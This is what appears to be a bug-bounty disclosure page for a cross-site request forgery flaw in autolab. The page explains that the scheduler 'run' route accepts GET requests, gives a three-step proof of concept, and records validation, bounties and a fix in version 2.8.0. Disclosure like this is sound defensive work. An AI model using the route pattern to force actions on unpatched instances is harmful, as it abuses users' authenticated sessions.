Cross site Request Forgery in running schedule by using GET method. in autolab/autolab

Valid

Reported on

May 11th 2022

Description

There is a CRSF in autolab source code in running scheduler due to usage of GET method.

Proof of Concept

  1. Install a local instance of autolab
  2. Go to /courses/<course-name>/schedulers and create a schedule
  3. Access the link courses/<course-name>/schedulers/<scheduler-id>/run and see that the schedulers is running

Impact

Forcefully make the user to run schedulers.

Occurrences

We are processing your report and will contact the autolab team within 24 hours. a year ago
We have contacted a member of the autolab team and are waiting to hear back a year ago
Joey Wildman validated this vulnerability a year ago

We have verified this issue and are working on a fix.

justinp09010 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Damian Ho marked this as fixed in 2.8.0 with commit af5eb6 a year ago
Damian Ho has been awarded the fix bounty
This vulnerability will not receive a CVE
routes.rb#L75 has been validated
to join this conversation